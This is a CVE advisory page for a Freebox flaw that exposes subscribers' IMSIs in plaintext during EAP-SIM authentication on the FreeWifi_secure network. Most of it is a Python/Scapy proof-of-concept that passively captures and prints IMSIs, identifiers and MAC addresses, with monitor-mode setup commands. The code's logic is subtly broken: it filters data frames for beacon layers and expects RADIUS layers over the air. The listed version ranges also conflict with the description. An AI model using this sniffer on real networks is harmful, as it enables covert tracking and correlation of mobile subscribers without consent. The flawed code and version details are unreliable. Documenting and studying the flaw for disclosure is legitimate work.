Security Vulnerability Report
CVE-2025-63292 CVSS 3.5 LOW

CVE-2025-63292

Published: 2025-11-17 19:16:20
Last Modified: 2026-02-04 20:50:13

Description

Freebox v5 HD (firmware = 1.7.20), Freebox v5 Crystal (firmware = 1.7.20), Freebox v6 Révolution r1–r3 (firmware = 4.7.x), Freebox Mini 4K (firmware = 4.7.x), and Freebox One (firmware = 4.7.x) were discovered to expose subscribers' IMSI identifiers in plaintext during the initial phase of EAP-SIM authentication over the `FreeWifi_secure` network. During the EAP-Response/Identity exchange, the subscriber's full Network Access Identifier (NAI), which embeds the raw IMSI, is transmitted without encryption, tunneling, or pseudonymization. An attacker located within Wi-Fi range (~100 meters) can passively capture these frames without requiring user interaction or elevated privileges. The disclosed IMSI enables device tracking, subscriber correlation, and long-term monitoring of user presence near any broadcasting Freebox device. The vendor acknowledged the vulnerability, and the `FreeWifi_secure` service is planned for full deactivation by 1 October 2025.

CVSS Details

CVSS Score: 3.5
Severity: LOW
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:freebox:v5_hd_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:freebox:v5_hd:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:freebox:v5_crystal_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:freebox:v5_crystal:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:freebox:v6_revolution_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:freebox:v6_revolution:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:freebox:mini_4k_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:freebox:mini_4k:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:freebox:one_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:freebox:one:-:*:*:*:*:*:*:* - NOT VULNERABLE
Freebox v5 HD firmware < 1.7.20
Freebox v5 Crystal firmware < 1.7.20
Freebox v6 Révolution r1-r3 firmware < 4.7.x
Freebox Mini 4K firmware < 4.7.x
Freebox One firmware < 4.7.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-63292 PoC - Freebox FreeWifi_secure IMSI Information Disclosure
This PoC demonstrates passive capture of IMSI from FreeWifi_secure EAP-SIM authentication
Note: Requires monitor mode wireless interface and Scapy library
"""

from scapy.all import sniff, Dot11, EAP, Radius
from scapy.layers.dot11 import RadioTap, Dot11Beacon, Dot11ProbeResp
import re


def parse_eap_identity(pkt):
    """
    Parse EAP-Response/Identity packet to extract NAI containing IMSI
    """
    if pkt.haslayer(EAP):
        eap_layer = pkt.getlayer(EAP)
        if hasattr(eap_layer, 'identity'):
            nai = eap_layer.identity.decode('utf-8', errors='ignore')
            # Extract IMSI from NAI format: IMSI@realm
            imsi_match = re.match(r'^(\d+)@', nai)
            if imsi_match:
                imsi = imsi_match.group(1)
                print(f"[+] Captured IMSI: {imsi}")
                print(f"[+] Full NAI: {nai}")
                print(f"[+] Source MAC: {pkt.addr2}")
                return {'imsi': imsi, 'nai': nai, 'mac': pkt.addr2}
    return None


def packet_handler(pkt):
    """
    Handle captured packets, filter for FreeWifi_secure EAP frames
    """
    # Check for Data frames (subtype 0x20-0x2f)
    if pkt.haslayer(Dot11) and pkt.type == 2:
        ssid = None
        # Try to extract SSID from probe requests/responses
        if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
            if hasattr(pkt, 'info'):
                try:
                    ssid = pkt.info.decode('utf-8')
                except:
                    pass
        # Filter for FreeWifi_secure network
        if ssid == 'FreeWifi_secure' or b'FreeWifi_secure' in bytes(pkt):
            result = parse_eap_identity(pkt)
            if result:
                return result
    # Check for EAP over LAN frames
    if pkt.haslayer(Radius):
        result = parse_eap_identity(pkt)
        if result:
            return result
    return None


def start_capture(interface='wlan0mon', timeout=60):
    """
    Start passive capture on specified monitor mode interface

    Args:
        interface: Wireless interface in monitor mode
        timeout: Capture duration in seconds
    """
    print(f"[*] Starting passive capture on {interface}")
    print("[*] Waiting for FreeWifi_secure EAP-SIM authentication frames...")
    print("[*] Press Ctrl+C to stop")
    try:
        packets = sniff(iface=interface, prn=packet_handler, timeout=timeout)
        print(f"\n[+] Captured {len(packets)} packets")
    except KeyboardInterrupt:
        print("\n[!] Capture stopped by user")
    except Exception as e:
        print(f"[!] Error: {e}")
        print("[!] Make sure interface is in monitor mode:")
        print("[!] sudo ip link set wlan0 down")
        print("[!] sudo iw dev wlan0 set type monitor")
        print("[!] sudo ip link set wlan0 up")


if __name__ == '__main__':
    import sys
    interface = sys.argv[1] if len(sys.argv) > 1 else 'wlan0mon'
    start_capture(interface=interface)
```

References

https://7h30th3r0n3.fr/the-vulnerability-that-killed-freewifi_secure/ (Broken Link)
https://gist.github.com/7h30th3r0n3/1a0fadb19f1528e3d3f6bad9f680c3b0#file-cve-2025-63292-frebox-imsi-md (Exploit, Third Party Advisory)

Weakness

CWE-319